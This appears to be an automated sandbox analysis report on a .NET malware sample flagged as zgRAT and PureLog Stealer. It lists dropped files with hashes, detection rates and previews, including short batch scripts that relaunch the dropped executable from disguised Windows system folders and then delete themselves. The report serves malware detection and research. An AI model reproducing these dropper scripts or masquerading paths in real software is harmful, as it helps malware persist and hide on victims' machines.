Preview:	WCX6So1XZtStdZflPnBM5vMbUcHv9lJjcBPjH5nefdbv7CtvldcEwO9k06mzhGYxjsQcJ6dU9gqbUadRtWJfIFxOBotKTy7ZFnLPvQlp9IEPhiQZcUGL62pe4CafNTBLiQVqOOfcvdfAAhqdYTs8rwdN8rUtzGcqH2rRMjKOyoZcWpdXV7G3lCewwIrh4vnpBz2I0YQzIdJCWB0TN6Y19jFEY4eE1nTCAubhwVg6qRuH3bZvSYT7Xvpbtxu64M7fKGCmkSg1abKsz8L6etwdTVpPF9y9lkCeTO6wZxL91ch6k6mulxbKaeLybwglehQ0YqYkBZgqiwl1yspIWDXxI1EzDIUnRjfTMrh4iCtMRumn2U9sHYOaKcrhlig3E3Z8QSpHLukTUKgYOa7sImg2VFJtA9T9f0IXVoXko2hWy5G95TSKlxucXgnLI5HLbkxeCJCkDXEQEJEa8JyqrIYrFqAyAMbtuW4NHm7wQsHNtdXNcNM8HaeTMGYWIOj06VgrO1SWMCa9AK7mSwVxAclT2lABOknBIRRY7p8l4zvF9eSCIwEW2v0dtMzn0RImYY0t2jpmxu3KrgTXS72bgRIWaypu0VumrJqkoiJiHciI2pwM2cU2YqGHQdSE34wc9Rch0sstyUUEt9evCc1XA1NBDjUKPFpMpFJlMOWJtkEEVCXQ9hCaCYcHDbeQYietpIYo02iyGsoZxIpBLEKsCOKRmChvtFvKGVZNntaH9OUUtDU4vdFTXwqa7GByUwEB6dSbtcXboDsy4zijsn9Q9bwUp8PhsmwMJSYPv2LSGopUD1gIhcFrwyBer7wuNzsCRfplbSyzbqKVwcRycH9QgFaVR3ixFbFQ5nDiM5qOoPPGnpsOq8SG0cfLFTUiuAuAl4aIZtmhaumQzTrlLTHHI9

C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1656320
Entropy (8bit):	7.420770523484582
Encrypted:	false
SSDEEP:	24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
MD5:	07A0FB75F52C87371C88F48AE80AFA1B
SHA1:	A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
SHA-256:	51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
SHA-512:	0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: 7vP2IvNXqx.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......\|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z~....:.... ....8&.....(....*

C:\Program Files\Windows NT\TableTextService\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Security\BrowserCore\en-US\3569ad0d0ffd50

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.758439645051426
Encrypted:	false
SSDEEP:	6:0IkpPX1/gsxVPmwzSXGyTbpZIJCYGmt8Qg:0IkdXCsxVPqZTV0bho
MD5:	2F05EEA84B4A5D24D26E2EC0D0C3A493
SHA1:	0247B7DC7F41007E1BE90460127363239C293FCE
SHA-256:	0F17AC24F8C88C662AA236C5163036FF0D17A7D1A2EE2600597E1487DAB19F74
SHA-512:	727E91F856745F28E81310C01AA29C3B25C8B3E80CBCA6B35AF2FEF9573DA84567A3383D59DF924B91784098BC16524C54AA269812B8A1E13016604836DEC3E8
Malicious:	false
Preview:	Lw4EX1M0fAn2VqbfAK05J8p9hsmh4d0S9AjpW5WFap2m5XhYAinrZgCMG4gpOp6BJU3UHwJFxuedGDEJKOgW0J3c7WibZr1vt0ckeMROYi3oCiFD0WeAIkLAbaWuNrpG2tuQldp76S7SPOaYQflDM1mJocIE0hAq2xvSyzcWrgD0m3vM97dsGm3BGllIUkHYRQZbcHkbDOWpxvhvq6F2E

C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1656320
Entropy (8bit):	7.420770523484582
Encrypted:	false
SSDEEP:	24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
MD5:	07A0FB75F52C87371C88F48AE80AFA1B
SHA1:	A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
SHA-256:	51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
SHA-512:	0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......\|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z~....:.... ....8&.....(....*

C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Recovery\7ccfebd9e92364

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	169
Entropy (8bit):	5.623322765605893
Encrypted:	false
SSDEEP:	3:h63mUrxd8d+ZIwTgUuQ5jt4yYS23G08C5ycqzw6xkJwcK7C/48/WUGEHIaxu:hErXyUIJGjt/+3G45ycqzfxkJ9/4c/GL
MD5:	D7A92A06545FDC59268CF7D418725B2F
SHA1:	5A37E77169A62147A65CD37059C57BDE3DA41410
SHA-256:	A41377CC9A2D2F03D384F2CA90F339AE88C41AB7B5C86DC3F0C76023E6B92E9A
SHA-512:	EECAD2E81560F2668F80F7C9586A78219D9589A3C2BB08D8E9F54B8C55FDE56C47241F0ED4F43F33F158C0B0E8ACA53A78D3C6CA91F56FF73752E2F6B8203F8E
Malicious:	false
Preview:	rRO1JUalz9RCqzmKKQp2tJuwt4jCDYmzFwK01JdGNU676DLLgKuTZCahhbHOuXhaWc64pwSAxipZNwzpsYg2oTaDWmTaCOVzwfleHRft2tg0WAUulbgV0owDC3hDd28jMzmsLVia3wA4xjqWRiyksA8HsicNubQ9u6ngXmiQ2

C:\Recovery\UserOOBEBroker.exe

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1656320
Entropy (8bit):	7.420770523484582
Encrypted:	false
SSDEEP:	24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
MD5:	07A0FB75F52C87371C88F48AE80AFA1B
SHA1:	A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
SHA-256:	51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
SHA-512:	0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\UserOOBEBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\UserOOBEBroker.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......\|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z~....:.... ....8&.....(....*

C:\Recovery\UserOOBEBroker.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\EGjcLJxUTLCptztefbFicvsgXASnZ.exe.log

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1523
Entropy (8bit):	5.373534083924954
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mC1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT41
MD5:	5E675003E8A6113031BC81EC692CFE0A
SHA1:	53FAFEED5B3E6489BDD729B50C948DD00A7CBC83
SHA-256:	5A74192EB3D5A96FA18278AD0D7B9B4D791830D7F2ED7C70B3746B0A635DF24F
SHA-512:	4F22E0ED4CF9ED3CA13DF90EC96DE2257128EFD5B67579DC822386D6233836F1EA3E11DAEB1DB36227CB5B2C595F8C296A2EB0706D356B6C86EA98A4FCC018D7
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OH6KO8NBy1.exe.log

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	CSV text
Category:	modified
Size (bytes):	1089
Entropy (8bit):	5.357509376572314
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4x
MD5:	84D615B35EDCC29D404E189F0403DF92
SHA1:	9FA889FD1624FD4D42C8A1E53A6C878D563B2B05
SHA-256:	ED840908AC2487C0156C61BBFCF4332B1824C033F03400FE906BBB44482205F5
SHA-512:	ED5F44D349501CBC583275E7298F7546BCAC71674055767E57CA620A0E3EC48FA23B62A3BB4153B14AB7778740298BAF89E68BBA3663542D9086C0FEDA1599CD
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

C:\Users\user\AppData\Local\Temp\4RhEcQXavi

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:MFTOArDMY0Nc:MIAr7B
MD5:	334D2501B1E463F6971FA9661179F292
SHA1:	BD7C5040467BDEE6717DAE97D1D81B313FBFAC70
SHA-256:	6793EBF4A3415CB5599FCC61EA7435166B585FE6241398F2CC122E7877B9EB99
SHA-512:	6551E2900A35C6D36D9CEF11A45ABADA231F76D7F0422F2DD4FD2052ED1B948524837E225EEFF55AB1118B88858037D5C5D767AE196C705A534540B09B2D4B32
Malicious:	false
Preview:	M4NuI6InPezfCQryftibQhDaJ

C:\Users\user\AppData\Local\Temp\4U0fcSq6WH.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.375901185116155
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEiUsq+MGLFSKOZG1wkn23fKq:CuVEOCDEiZHifL
MD5:	4368EFB077CDD44BA947921460B6F287
SHA1:	57ED8EA767646BCF73A9D1BBF438C0DD1CA810CF
SHA-256:	86B605B23B9C812D770B8EBF911CD56F7518357A17E0B8CDAE3BBB15EF4DF870
SHA-512:	B67FC9823FF34653BD1126C0276694564E4DED3EDB11852724AFF311CC81E63920A228CB5DE682E0EE8949F6560B835930FAAC949F3B0110ECC6741ADA289E65
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\4U0fcSq6WH.bat"

C:\Users\user\AppData\Local\Temp\6CqDu4e8od

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.373660689688185
Encrypted:	false
SSDEEP:	3:ndOdwRLBY:uwtBY
MD5:	4F21D300E549E53A6F5410C44AD320E1
SHA1:	FF3374A00483C7B297711315B33ABDE5E10FF334
SHA-256:	E4612ACDAD787770CE43C8DE473533A347D5DAF75CCF5CF1D61998D0B56A837D
SHA-512:	4410D044DBB6BB0EA5FF12A5FE11182C369CF570551826FF4DB15571A2254D2C2C550AD1A95714BEEA0D406F45A668BF3F9A8516418E7D72BED4BEAE70E483C1
Malicious:	false
Preview:	sdnXWn8k0RS2BJlnqT9dGzEVa

C:\Users\user\AppData\Local\Temp\6O354YVTPq

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:nhBgn:nhBgn
MD5:	16DF7C44C02EF417BCFC243D14A3D8A2
SHA1:	7B83E1B1533D482ABD62A81630D6E00E348F837C
SHA-256:	A3ADD4B328A9D07F0F6990A8921E590C96BA2EDB0963EE14A02CD8B98B2CF509
SHA-512:	4B37B40A548D2DF9839BE18B58FF69104EA90AED3DE286D2717FA790E00E17A6C3CDA36117059365EBEDDE445026C15AE74B26AAB7A26939DF748DAE039615E1
Malicious:	false
Preview:	60NNfS9xGi9lqYViCohVu1yy7

C:\Users\user\AppData\Local\Temp\9ZQNubuJrx.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	261
Entropy (8bit):	5.351665212103039
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEiUsq+MGLFSKOZG1wkn23fRiH:HTg9uYDEiZHifpiH
MD5:	DE371299950E9883CF4C249F9B23CD8C
SHA1:	EC6EDFEED5E85C54367659EEDD5FDF7C2EED0209
SHA-256:	BA922AD4BDAF904A742D7E47527521A8AF6CE1C9BF20B0162270EF59A6456F18
SHA-512:	A555314312AEF17E4FE4A3258A17271C1C94724F381EE8CBAE35AFE42A3B0DAC1DAD992C913A8C88E58617F522A1578BF65F1EF97F74F2FB4F0A77D00017D780
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\9ZQNubuJrx.bat"

C:\Users\user\AppData\Local\Temp\9nb3HPdPUQ.bat

Download File

Process:	C:\Users\user\Desktop\OH6KO8NBy1.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	261
Entropy (8bit):	5.355283820827575
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEiUsq+MGLFSKOZG1wkn23fjqn:HTg9uYDEiZHifLqn
MD5:	436A5FFBDB4C23FCB0725528C5E714F7
SHA1:	1A3772A2B907508C437AD4B3A5D9E03B60DF76E4
SHA-256:	AF4015926C38BD01A295486C16039678676EA36D672ABDFD679A9D8CFCB0C455
SHA-512:	CCFB0180A94BCEE605BFCF917626D0E0A7AE1BF0436DEF4C2952C7C725DF9B7A841EB1019BB6C9794CD6D243BB632C7CE63B9D92734705B78AB2FFF63A0E28BB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\9nb3HPdPUQ.bat"

C:\Users\user\AppData\Local\Temp\HcHpe6AiA5

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.083856189774724
Encrypted:	false
SSDEEP:	3:tWVrIQVuh2yn:SBy
MD5:	1F6AA1921BDC41395E8DA62238EE1E40
SHA1:	40212185A63896D53C39E466A9A6D6C8354BFF70
SHA-256:	CA12305445D33706AA3714870BC071BAC8A0582447C80CD221D28AE8241775C9
SHA-512:	8329D84C6431B34EBADCE491ADB95E227B2EA7125548C695126B514449755ED05FA8C4F08D61A90632EB635D6192E22CCE23DA814315E3FE8E11D0ADA583FEC5
Malicious:	false
Preview:	01ws8Y133ekmuE4iKiiVSuijQ

C:\Users\user\AppData\Local\Temp\Ip3Bhi35Fh.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.376947281484813
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEiUsq+MGLFSKOZG1wkn23f1cMH:CuVEOCDEiZHifNcG
MD5:	6CE3745F70F087377FA8952A6C864D4B
SHA1:	5C9D5F36B6134C013ECF5C8F570B84EEAA379E77
SHA-256:	0299B12BB09C4C2C4AB56FD89B22FC1CDE6EE83218459A194A56C9D7B6B42500
SHA-512:	AF456692596FF0E24DE3B625101E9931B116FB89A44C8E047146D38D69FA201CD3B9796BDA89E169487CDB78C75EEB8CE4E7A51F97EAD0D7CA8CC8A4B8AA969E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Ip3Bhi35Fh.bat"

C:\Users\user\AppData\Local\Temp\KMG2LIZgv2.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.419957889272278
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEiUsq+MGLFSKOZG1wkn23fh5x:CuVEOCDEiZHifZj
MD5:	BAA7F414F49135E2DDFD8E2071885B7B
SHA1:	5D5DA0681B17EA4FD01DC30EAE45A51A77902191
SHA-256:	99714E207F6CA77AA77091159DFBEE898DB494532CC4D9399751F82B4C8571AD
SHA-512:	81BE86AC52955262B9FBD261AF7EE636238D2E8479570E316E2996D36DA15A8009090254780D5FFAC2C0B393479E8D43BA89C9032FB1DB3FF9FC892BFBB10E68
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KMG2LIZgv2.bat"

C:\Users\user\AppData\Local\Temp\NVJoNfH6eh.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.380538887367541
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEiUsq+MGLFSKOZG1wkn23flm:CuVEOCDEiZHifg
MD5:	ACDD3B31BC6799E721FAAE30041D9224
SHA1:	D67E69B354DC8380B6B53639ABC9E8D8D9044748
SHA-256:	199C916C38DFD70824EB571BC9E75974449F0A5332BFF48B0A1CE731D5A864D6
SHA-512:	D953A1A481BA0039895AD6A41D554316E2204A533850F5E11A1C6722D96C45DFC46A64775FD853499A5D24B00B6E991C6BFB21BF04267AB90D1C2B770BBA00A4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\NVJoNfH6eh.bat"

C:\Users\user\AppData\Local\Temp\Osft0y9e1S.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.350563234349996
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEiUsq+MGLFSKOZG1wkn23fDl:CuVEOCDEiZHif7l
MD5:	CF574686171F3EA58D26466E9179860B
SHA1:	1EDB2E151022A22AA9FC9D17EE14373925FCC20F
SHA-256:	00813678180B01E2A31DFF5B43D11323E5509E38E3FA9A3F1EA83FA93F0C8D55
SHA-512:	4B45BB1BDF7AB51CC0CF292CB7ED657097BFB0D1D0404F87014C6A74AAF6C2A4795D36393985951308D8A38D6D3B2CCB26AB0825AC5D77F07A883D00D4F04B38
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Osft0y9e1S.bat"

C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	213
Entropy (8bit):	5.395923074817987
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DEiUsq+MGLFSKOZG1wkn23fx3Sp:CuVEOCDEiZHifop
MD5:	823251BFBC76EAAEA718633224AB5DD1
SHA1:	5715B71955F53B77AF8D92D1B9279C528E496376
SHA-256:	0CD41576AEBC060F21A77B03BD8554045044BC999D8F19D39F4C20D7F9F36096
SHA-512:	B6CD655E7CB3EB6EB17ED517EBDA4A3CFED96552265BC28DA9BA9467589530FAE0DBF1291E58EC26706F537239B8671ADF5961A1398E0A93F0D3854C0E18CF8B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\OwDUg2gYJx.bat"

C:\Users\user\AppData\Local\Temp\RKW7EBQnZE.bat

Download File

Process:	C:\Program Files\Windows Security\BrowserCore\en-US\EGjcLJxUTLCptztefbFicvsgXASnZ.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	261
Entropy (8bit):	5.37677669620856
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEiUsq+MGLFSKOZG1wkn23fMr:HTg9uYDEiZHifY
MD5:	C4234668BD54E17F688ECA558E83710E
SHA1:	FD3CFD78863E9B7BFD42C17AE357D04ECC55DFB3
